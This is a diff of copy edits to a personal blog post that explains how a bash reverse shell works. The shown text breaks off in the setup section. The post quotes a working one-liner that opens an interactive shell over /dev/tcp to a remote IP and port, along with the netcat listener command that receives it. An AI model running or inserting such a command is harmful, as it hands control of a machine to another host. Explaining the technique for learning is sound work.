sainaen/hypothetical.me/content/post/2018-01-10_reverse_shell_in_bash.md

 tags = ["security", "today-i-learned"]
 +++

-Yesterday I saw a message from [Bryan Brake] on one the of [BrakeSec Slack] channels:
+Yesterday I saw a message from [Bryan Brake] on one of the [BrakeSec Slack] channels:

 > This is a pretty bit of bash scripting *bash -i >& /dev/tcp/192.168.8.198&#x002f;4444 0>&1*

-I knew that it’s a reverse shell&#8239;---&thinsp;a tool that connects from the target computer to you (hence the ‘reverse’) and allows executing commands on that machine (‘shell’).
+I knew that it’s a reverse shell&#8239;---&thinsp;a tool that connects the target computer back to you (hence the ‘reverse’) and then allows you to execute commands on that machine (‘shell’).
 But how does it work?

 *Skip to the [Summary] if you just want the answer.*

 ## Setup

-Bryan than mentioned that is supposed to be used in conjunction with a [netcat], which is `nc` or `ncat` depending on your version, listening on port `4444` running on the computer with <abbr>IP</abbr> `192.168.8.198`:
+Bryan then mentioned that this command is supposed to be used with a [netcat], which is `nc` or `ncat` depending on your version, listening on port `4444` of the computer with <abbr>IP</abbr> `192.168.8.198`:
 ```
 $ nc -v -n -l -p 4444
 # -v — be verbose